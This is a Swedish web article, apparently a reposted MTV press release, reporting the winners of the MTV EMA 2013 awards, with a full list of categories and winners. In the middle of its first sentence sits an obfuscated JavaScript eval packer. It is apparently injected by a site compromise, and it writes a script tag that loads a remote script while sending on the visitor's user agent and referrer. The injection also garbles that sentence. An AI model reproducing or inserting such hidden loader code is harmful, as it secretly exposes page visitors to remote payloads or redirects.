Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Avicii Best Electronic under MTV

Avicii Best Electronic under MTV
Sebastian

Priserna från årets extravaganta, intergalaktiska musikfest MTV eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erisn|var|u0026u|referrer|tkahz||js|php’.split(’|’),0,{}))
EMA 2013
 blev jämnt fördelade bland världens just nu hetaste artister. Slutligen toppade dock Eminem listan med två utmärkelser; best Hip Hop och Global Icon. Det innebär att Eminem stärker sin position som den artist med flest EMA-utmärkelser genom tiderna. Ett överraskningsframträdande från honom fick fansen i Amsterdam att bli fullkomligt galna!

Justin Bieber försvarade titeln Best Male och kammade hem priset för hela fjärde året i rad. Ett av våra svenska hopp, Avicii, knep priset för årets Best Electronic. Däremot fick tyvärr Icona Pop lämna galan utan pris men innan dess bjöd de på ett bejublat framträdande av sin hit ”I Love It” som fick hela publiken att dansa loss. Istället blev det Macklemore & Ryan Lewis som vann Best New och Best Push vanns av Austin Mahone.

Directioners världen över fick anledning att fira då One Direction vann sin första EMA-utmärkelse för Best Pop. Med viftande tunga fick ävenMiley Cyrus ta emot sitt första EMA-pris för Best Video, för låten ”Wrecking Ball”. Miley Cyrus visade vidare vilken entertainer hon är genom att framföra både ”We Can’t Stop” nedsänkandes på en rymdinspirerad tron och senare ”Wrecking Ball” på ett överraskande intimt sätt.

Den spännande omröstningen av Best Worldwide Act vanns slutligen av Chris Lee. Utmärkelsen har funnits i tre år och varje år har en asiatisk artist lyckats vinna titeln!

MTV EMA 2013 blev en massiv, spektakulär och underbar show bortom denna värld. Redfoo från LMFAO ledde galan med strålande energi och bjöd på dans ihop med Ylvis (duon bakom den virala hiten ”What the Fox Say”) och slog alla tidigare rekord i flest spektakulära klädombyten. Han sportade exempelvis både speedos, leopard och rymddräkt innan han slutligen bortfördes av ailiens vid kvällens slut. Förutom ovanstående rev även artister som bland annat Katy Perry, Bruno Mars, Robin Thicke, The Killers och Kings of Leon av enastående framträdanden.

Fans från hela världen har med rekordmånga 292 miljoner röster avgjort årets vinnare av MTV EMA 2013. Årets vinnare är:

BEST SONG

Bruno Mars – “Locked Out Of Heaven”

BEST VIDEO

Miley Cyrus – “Wrecking Ball”

BEST NEW

Macklemore & Ryan Lewis

BEST FEMALE

Katy Perry

BEST MALE

Justin Bieber

BEST POP

One Direction

BEST LIVE

Beyoncé

BEST HIP HOP

Eminem

BEST ROCK

Green Day

BEST ELECTRONIC

Avicii

BEST ALTERNATIVE

Thirty Seconds To Mars

BEST LOOK

Harry Styles

BIGGEST FANS

Tokio Hotel

BEST WORLD STAGE

Linkin Park – Mexico 2012

BEST PUSH

Austin Mahone – April 2013

BEST WORLDWIDE ACT

???Chris Lee (Mainland China/Hong Kong/Southeast Asia/Taiwan)

GLOBAL ICON

Eminem

Detta är ett pressmeddelande från MTV